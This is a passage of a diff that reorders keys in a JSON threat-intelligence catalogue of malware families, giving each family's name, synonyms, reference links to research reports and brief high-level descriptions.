"https://objective-see.com/blog/blog_0x16.html", "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", - "value": "Mokes", - "description": "" + "value": "Mokes" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec", "https://objective-see.com/blog/blog_0x20.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", - "value": "Mughthesec", - "description": "" + "value": "Mughthesec" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.oceanlotus", "https://www.alienvault.com/blogs/labs-research/oceanlotus-for-os-x-an-application-bundle-pretending-to-be-an-adobe-flash-update", "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", "https://researchcenter.paloaltonetworks.com/2017/06/unit42-new-improved-macos-backdoor-oceanlotus/", "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-backdoor-linked-to-oceanlotus-found/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "65b7eff4-741c-445e-b4e0-8a4e4f673a65", - "value": "OceanLotus", - "description": "" + "value": "OceanLotus" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.olyx", "http://contagiodump.blogspot.com/2011/07/jul-25-mac-olyx-gh0st-backdoor-in-rar.html", "https://news.drweb.com/show/?i=1750&lng=en&c=14" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cd397973-8f42-4c49-8322-414ea77ec773", - "value": "Olyx", - "description": "" + "value": "Olyx" }, { + "description": "", "meta": { - "synonyms": [ - "Findzip" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.patcher", "http://www.welivesecurity.com/2017/02/22/new-crypto-ransomware-hits-macos/" - ] + ], + "synonyms": [ + "Findzip" + ], + "type": [] }, "uuid": "bad1057c-4f92-4747-a0ec-31bcc062dab8", - "value": "Patcher", - "description": "" + "value": "Patcher" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pirrit", "http://go.cybereason.com/rs/996-YZT-709/images/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf", "http://www.zdnet.com/article/maker-of-sneaky-mac-adware-sends-security-researcher-cease-and-desist-letter/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b749ff3a-df68-4b38-91f1-649864eae52c", - "value": "Pirrit", - "description": "" + "value": "Pirrit" }, { + "description": "", "meta": { - "synonyms": [ - "Calisto" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.proton_rat", "https://www.cybereason.com/labs-blog/labs-proton-b-what-this-mac-malware-actually-does", @@ -2366,319 +2366,321 @@ "https://www.welivesecurity.com/2017/10/20/osx-proton-supply-chain-attack-elmedia/", "https://www.hackread.com/hackers-selling-undetectable-proton-mac-malware/", "https://www.cybersixgill.com/wp-content/uploads/2017/02/02072017%20-%20Proton%20-%20A%20New%20MAC%20OS%20RAT%20-%20Sixgill%20Threat%20Report.pdf" - ] + ], + "synonyms": [ + "Calisto" + ], + "type": [] }, "uuid": "d7e31f19-8bf2-4def-8761-6c5bf7feaa44", - "value": "Proton RAT", - "description": "" + "value": "Proton RAT" }, { + "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.pwnet", "https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "70059ec2-9315-4af7-b65b-2ec35676a7bb", - "value": "Pwnet", - "description": "Cryptocurrency miner that was distributed masquerading as a Counter-Strike: Global Offensive hack." + "value": "Pwnet" }, { + "description": "", "meta": { - "synonyms": [ - "Retefe" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.retefe", "http://blog.checkpoint.com/2017/04/27/osx-malware-catching-wants-read-https-traffic/", "http://www.brycampbell.co.uk/new-blog/2017/4/30/retefe-and-osxdok-one-and-the-same", "https://blog.checkpoint.com/2017/07/13/osxdok-refuses-go-away-money/", "https://www.govcert.admin.ch/blog/33/the-retefe-saga" - ] + ], + "synonyms": [ + "Retefe" + ], + "type": [] }, "uuid": "80acc956-d418-42e3-bddf-078695a01289", - "value": "Dok", - "description": "" + "value": "Dok" }, { + "description": "General purpose backdoor", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.systemd", "https://vms.drweb.com/virus/?_is=1&i=15299312&lng=en" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a8e7687b-9db7-4606-ba81-320d36099e3a", - "value": "systemd", - "description": "General purpose backdoor" + "value": "systemd" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.uroburos", "https://blog.fox-it.com/2017/05/03/snake-coming-soon-in-mac-os-x-flavour/", "https://blog.malwarebytes.com/threat-analysis/2017/05/snake-malware-ported-windows-mac/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d674ffd2-1f27-403b-8fe9-b4af6e303e5c", - "value": "Uroburos", - "description": "" + "value": "Uroburos" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.winnti", " https://401trg.pw/an-update-on-winnti/", "https://401trg.pw/winnti-evolution-going-open-source/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "7f8166e2-c7f4-4b48-a07b-681b61a8f2c1", - "value": "Winnti", - "description": "" + "value": "Winnti" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirelurker", "https://objective-see.com/blog/blog_0x16.html", "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", - "value": "WireLurker", - "description": "" + "value": "WireLurker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.wirenet", "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", "https://news.drweb.com/show/?i=2679&lng=en&c=14" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", - "value": "Wirenet", - "description": "" + "value": "Wirenet" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xagent", "https://twitter.com/PhysicalDrive0/status/845009226388918273", "https://download.bitdefender.com/resources/files/News/CaseStudies/study/143/Bitdefender-Whitepaper-APT-Mac-A4-en-EN-web.pdf", "http://researchcenter.paloaltonetworks.com/2017/02/unit42-xagentosx-sofacys-xagent-macos-tool/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", - "value": "X-Agent", - "description": "" + "value": "X-Agent" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xslcmd", "https://objective-see.com/blog/blog_0x16.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "120a5890-dc3e-42e8-950e-b5ff9a849d2a", - "value": "XSLCmd", - "description": "" + "value": "XSLCmd" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.pas", "https://www.us-cert.gov/security-publications/GRIZZLY-STEPPE-Russian-Malicious-Cyber-Activity", "https://blog.erratasec.com/2016/12/some-notes-on-iocs.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e6a40fa2-f79f-40e9-89d3-a56984bc51f7", - "value": "PAS", - "description": "" + "value": "PAS" }, { + "description": "", "meta": { - "synonyms": [ - "Webshell by Orb" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/php.wso", "https://github.com/wso-shell", "https://securelist.com/energetic-bear-crouching-yeti/85345/" - ] + ], + "synonyms": [ + "Webshell by Orb" + ], + "type": [] }, "uuid": "7f3794fc-662e-4dde-b793-49bcaccc96f7", - "value": "WSO", - "description": "" + "value": "WSO" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/pl.silence_ddos", "https://www.group-ib.com/resources/threat-research/silence.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b5cc7a39-305b-487e-b15a-02dcebefce90", - "value": "Silence DDoS", - "description": "" + "value": "Silence DDoS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.bondupdater", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "99600ba5-30a0-4ac8-8583-6288760b77c3", - "value": "BONDUPDATER", - "description": "" + "value": "BONDUPDATER" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.ghostminer", "https://blog.minerva-labs.com/ghostminer-cryptomining-malware-goes-fileless" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "0db05333-2214-49c3-b469-927788932aaa", - "value": "GhostMiner", - "description": "" + "value": "GhostMiner" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.poshspy", "https://www.fireeye.com/blog/threat-research/2017/03/dissecting_one_ofap.html", "https://github.com/matthewdunwoody/POSHSPY" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4df1b257-c242-46b0-b120-591430066b6f", - "value": "POSHSPY", - "description": "" + "value": "POSHSPY" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powerware", "https://blog.cylance.com/ransomware-update-todays-bountiful-cornucopia-of-extortive-threats" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5c5beab9-614c-4c86-b369-086234ddb43c", - "value": "PowerWare", - "description": "" + "value": "PowerWare" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.powruner", "https://www.boozallen.com/s/insight/blog/dark-labs-discovers-apt34-malware-variants.html?cid=spo-csatb-2" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "63f6df51-4de3-495a-864f-0a7e30c3b419", - "value": "POWRUNER", - "description": "" + "value": "POWRUNER" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.quadagent", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e27bfd65-4a58-416a-b03a-1ab1703edb24", - "value": "QUADAGENT", - "description": "" + "value": "QUADAGENT" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.roguerobin", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-new-threat-actor-group-darkhydrus-targets-middle-east-government/", "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.ez428aw98bca" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1e27a569-1899-4f6f-8c42-aa91bf0a539d", - "value": "RogueRobin", - "description": "" + "value": "RogueRobin" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.tater", "https://github.com/Kevin-Robertson/Tater" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "808445e6-f51c-4b5d-a812-78102bf60d24", - "value": "Tater PrivEsc", - "description": "" + "value": "Tater PrivEsc" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.thundershell", "https://github.com/Mr-Un1k0d3r/ThunderShell" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "fd9904a6-6e06-4b50-8bfd-64ffb793d4a4", - "value": "ThunderShell", - "description": "" + "value": "ThunderShell" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ps1.wmimplant", "https://www.fireeye.com/blog/threat-research/2017/03/wmimplant_a_wmi_ba.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d1150a1a-a2f4-4954-b22a-a85b7876408e", - "value": "WMImplant", - "description": "" + "value": "WMImplant" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.brickerbot", "https://www.bleepingcomputer.com/news/security/brickerbot-author-claims-he-bricked-two-million-devices/", @@ -2689,60 +2691,57 @@ "https://www.trustwave.com/Resources/SpiderLabs-Blog/BrickerBot-mod_plaintext-Analysis/", "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "http://depastedihrn3jtw.onion/show.php?md5=2c822a990ff22d56f3b9eb89ed722c3f" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "f0ff8751-c182-4e9c-a275-81bb03e0cdf5", - "value": "BrickerBot", - "description": "" + "value": "BrickerBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/py.saphyra", "https://securityintelligence.com/dissecting-hacktivists-ddos-tool-saphyra-revealed/", "https://www.youtube.com/watch?v=Bk-utzAlYFI" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "30a22cdb-9393-460b-86ae-08d97c626155", - "value": "Saphyra", - "description": "" + "value": "Saphyra" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/symbian.flexispy", "https://www.randhome.io/blog/2017/04/23/lets-talk-about-flexispy/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "4305d59a-0d07-4021-a902-e7996378898b", - "value": "FlexiSpy", - "description": "" + "value": "FlexiSpy" }, { + "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.7ev3n", "https://blog.malwarebytes.com/threat-analysis/2016/05/7ev3n-ransomware/", "https://www.cyber.nj.gov/threat-profiles/ransomware-variants/7ev3n" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ac2608e9-7851-409f-b842-e265b877a53c", - "value": "7ev3n", - "description": "The NJCCIC describes 7ev3n as a ransomware \"that targets the Windows OS and spreads via spam emails containing malicious attachments, as well as file sharing networks. It installs multiple files in the LocalAppData folder, each of which controls different functions including disabling bootup recovery options, deleting the ransomware installation file, encrypting data, and gaining administrator privileges. This variant also adds registry keys that disables various Windows function keys such as F1, F3, F4, F10, Alt, Num Lock, Ctrl, Enter, Escape, Shift, and Tab. Files encrypted by 7ev3n are labeled with a .R5A extension. It also locks victims out of Windows recovery options making it challenging to repair the damage done by 7ev3n.\"" + "value": "7ev3n" }, { + "description": "", "meta": { - "synonyms": [ - "Hydraq", - "McRAT" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.9002", "https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html", @@ -2754,126 +2753,126 @@ "https://www.fireeye.com/blog/threat-research/2013/02/lady-boyle-comes-to-town-with-a-new-exploit.html", "https://www.proofpoint.com/us/threat-insight/post/operation-rat-cook-chinese-apt-actors-use-fake-game-thrones-leaks-lures", "https://blog.trendmicro.com/trendlabs-security-intelligence/supply-chain-attack-operation-red-signature-targets-south-korean-organizations/" - ] + ], + "synonyms": [ + "Hydraq", + "McRAT" + ], + "type": [] }, "uuid": "bab647d7-c9d6-4697-8fd2-1295c7429e1f", - "value": "9002 RAT", - "description": "" + "value": "9002 RAT" }, { + "description": "", "meta": { - "synonyms": [ - "PinkKite" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abaddon_pos", "https://www.proofpoint.com/us/threat-insight/post/AbaddonPOS-A-New-Point-Of-Sale-Threat-Linked-To-Vawtrak", "https://threatpost.com/new-pos-malware-pinkkite-takes-flight/130428/" - ] + ], + "synonyms": [ + "PinkKite" + ], + "type": [] }, "uuid": "a492a3e0-13cb-4b7d-93c1-027e7e69b44d", - "value": "AbaddonPOS", - "description": "" + "value": "AbaddonPOS" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.abbath_banker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e46262cd-961f-4c7d-8976-0d35a066ab83", - "value": "Abbath Banker", - "description": "" + "value": "Abbath Banker" }, { + "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acridrain", "https://thisissecurity.stormshield.com/2018/08/28/acridrain-stealer/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ffc368a5-2cd0-44ca-869b-223fdb462c41", - "value": "AcridRain", - "description": "AcridRain is a password stealer written in C/C++. This malware can steal credentials, cookies, credit cards from multiple browsers. It can also dump Telegram and Steam sessions, rob Filezilla recent connections, and more." + "value": "AcridRain" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.acronym", "https://www.arbornetworks.com/blog/asert/acronym-m-is-for-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "bee73d0f-8ff3-44ba-91dc-d883884c754e", - "value": "Acronym", - "description": "" + "value": "Acronym" }, { + "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adam_locker", "https://twitter.com/JaromirHorejsi/status/813712587997249536", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-recap-dec-19-dec-31-2016" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "1ed36f9a-ae00-4d16-bbf7-e97217385fb1", - "value": "AdamLocker", - "description": "Adam Locker (detected as RANSOM_ADAMLOCK.A) is a ransomware that encrypts targeted files on a victim’s system but offers them a free decryption key which can be accessed through Adf.ly, a URL shortening and advertising service." + "value": "AdamLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adkoob", "https://news.sophos.com/en-us/2018/07/29/adkoob-information-thief-targets-facebook-ad-purchase-info/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "ace3cb99-3523-44a1-92cc-9f002cf364bf", - "value": "win.adkoob", - "description": "" + "value": "win.adkoob" }, { + "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.advisorsbot", "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-2-advisorsbot" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "e3f49ec0-614e-4070-a620-5196d45df7b5", - "value": "AdvisorsBot", - "description": "AdvisorsBot is a downloader named after early command and control domains that all contained the word \"advisors\". The malware is written in C and employs a number of anti-analysis features such as junk code, stack strings and Windows API function hashing." + "value": "AdvisorsBot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.adylkuzz", "https://www.proofpoint.com/us/threat-insight/post/adylkuzz-cryptocurrency-mining-malware-spreading-for-weeks-via-eternalblue-doublepulsar" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "3d6c3ed5-804d-4d0b-8a01-68bc54ae8c58", - "value": "Adylkuzz", - "description": "" + "value": "Adylkuzz" }, { + "description": "", "meta": { - "synonyms": [ - "ComRAT", - "Sun rootkit" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_btz", "http://blog.threatexpert.com/2008/11/agentbtz-threat-that-hit-pentagon.html", @@ -2883,16 +2882,19 @@ "https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf", "http://www.intezer.com/new-variants-of-agent-btz-comrat-found/", "http://www.intezer.com/new-variants-of-agent-btz-comrat-found-part-2/" - ] + ], + "synonyms": [ + "ComRAT", + "Sun rootkit" + ], + "type": [] }, "uuid": "d9cc15f7-0880-4ae4-8df4-87c58338d6b8", - "value": "Agent.BTZ", - "description": "" + "value": "Agent.BTZ" }, { + "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analyzing-various-layers-agentteslas-packing/", @@ -2902,46 +2904,42 @@ "https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html", "https://thisissecurity.stormshield.com/2018/01/12/agent-tesla-campaign/", "https://blogs.forcepoint.com/security-labs/part-two-camouflage-netting" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b88e29cf-79d9-42bc-b369-0383b5e04380", - "value": "Agent Tesla", - "description": "A .NET based keylogger and RAT readily available to actors. Logs keystrokes and the host's clipboard and beacons this information back to the C2." + "value": "Agent Tesla" }, { + "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aldibot", "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/aldibot" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "43ec8adc-0658-4765-be20-f22679097fab", - "value": "Aldibot", - "description": "According to Trend Micro Encyclopia:\r\nALDIBOT first appeared in late August 2012 in relevant forums. Variants can steal passwords from the browser Mozilla Firefox, instant messenger client Pidgin, and the download manager jDownloader. ALDIBOT variants send the gathered information to their command-and-control (C&C) servers.\r\n\r\nThis malware family can also launch Distributed Denial of Service (DDoS) attacks using different protocols such as HTTP, TCP, UDP, and SYN. It can also perform flood attacks via Slowloris and Layer 7.\r\n\r\nThis bot can also be set up as a SOCKS proxy to abuse the infected machine as a proxy for any protocols.\r\n\r\nThis malware family can download and execute arbitrary files, and update itself. Variants can steal information, gathering the infected machine’s hardware identification (HWID), host name, local IP address, and OS version.\r\n\r\nThis backdoor executes commands from a remote malicious user, effectively compromising the affected system." + "value": "Aldibot" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alice_atm", "http://blog.trendmicro.com/trendlabs-security-intelligence/alice-lightweight-compact-no-nonsense-atm-malware/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "41bfc8ad-ce2c-4ede-aa54-b3240a5cc8ca", - "value": "Project Alice", - "description": "" + "value": "Project Alice" }, { + "description": "", "meta": { - "synonyms": [ - "alina_spark", - "katrina", - "alina_eagle" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alina_pos", "http://www.xylibox.com/2013/02/alina-34-pos-malware.html", @@ -2951,163 +2949,162 @@ "https://blog.trendmicro.com/trendlabs-security-intelligence/two-new-pos-malware-affecting-us-smbs/", "https://www.nuix.com/blog/alina-continues-spread-its-wings", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Alina-POS-malware--sparks--off-a-new-variant/" - ] + ], + "synonyms": [ + "alina_spark", + "katrina", + "alina_eagle" + ], + "type": [] }, "uuid": "27d90cd6-095a-4c28-a6f2-d1b47eae4f70", - "value": "Alina POS", - "description": "" + "value": "Alina POS" }, { + "description": "", "meta": { - "synonyms": [ - "Starman" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.allaple", "https://researchcenter.paloaltonetworks.com/2014/08/hunting-mutex/", "https://trapx.com/wp-content/uploads/2017/08/White_Paper_TrapX_AllapleWorm.pdf" - ] + ], + "synonyms": [ + "Starman" + ], + "type": [] }, "uuid": "6aabb492-e282-40fb-a840-fe4e643ec094", - "value": "Allaple", - "description": "" + "value": "Allaple" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_communicator", "https://researchcenter.paloaltonetworks.com/2017/11/unit42-oilrig-deploys-alma-communicator-dns-tunneling-trojan/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "a0881a0c-e677-495b-b475-290af09bb716", - "value": "Alma Communicator", - "description": "" + "value": "Alma Communicator" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alma_locker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "b5138914-6c2b-4c8e-b182-d94973fe5a6b", - "value": "AlmaLocker", - "description": "" + "value": "AlmaLocker" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alpc_lpe", "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "86517f1a-6e67-47ba-95dd-84b3125ad983", - "value": "ALPC Local PrivEsc", - "description": "" + "value": "ALPC Local PrivEsc" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphabet_ransomware", "https://twitter.com/JaromirHorejsi/status/813714602466877440" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "5060756f-8385-465d-a7dd-7bf09a54da92", - "value": "Alphabet Ransomware", - "description": "" + "value": "Alphabet Ransomware" }, { + "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as Alpha Ransomware, is based on the EDA2 ransomware, an educational project open-sourced on GitHub last year by Turkish researcher Utku Sen. A Russian coder seems to have cloned this repository before it was taken down and used it to create his ransomware, a near-perfect clone of EDA2. The ransomware's author, is said to be paying a great deal of attention to updating the ransomware with new features, so it would always stay ahead of antivirus engines, and evade detection.\r\n\r\nAlphaLocker's encryption process starts when the ransomware contacts its C&C server. The server generates a public and a private key via the RSA-2048 algorithm, sending the public key to the user's computer and saving the private key to its server. On the infected computer, the ransomware generates an AES-256 key for each file it encrypts, and then encrypts this key with the public RSA key, and sent to the C&C server.\r\n\r\nTo decrypt their files, users have to get ahold of the private RSA key which can decrypt the AES-encrypted files found on their computers. Users have to pay around 0.35 Bitcoin (~$450) to get this key, packaged within a nice decrypter.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.alphalocker", "https://blog.cylance.com/an-introduction-to-alphalocker" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "c1b9e8c5-9283-4dbe-af10-45956a446fb7", - "value": "AlphaLocker", - "description": "A new form of ransomware named AlphaLocker that is built by cybercriminals for cybercriminals. Like all incarnations of Ransomware As A Service (RaaS), the AlphaLocker malware program can be purchased and launched by pretty much anyone who wants to get into the ransomware business. What makes AlphaLocker different from other forms of RaaS is its relatively cheap cost. The ransomware can be purchased for just $65 in bitcoin.\r\n\r\nAlphaLocker, also known as 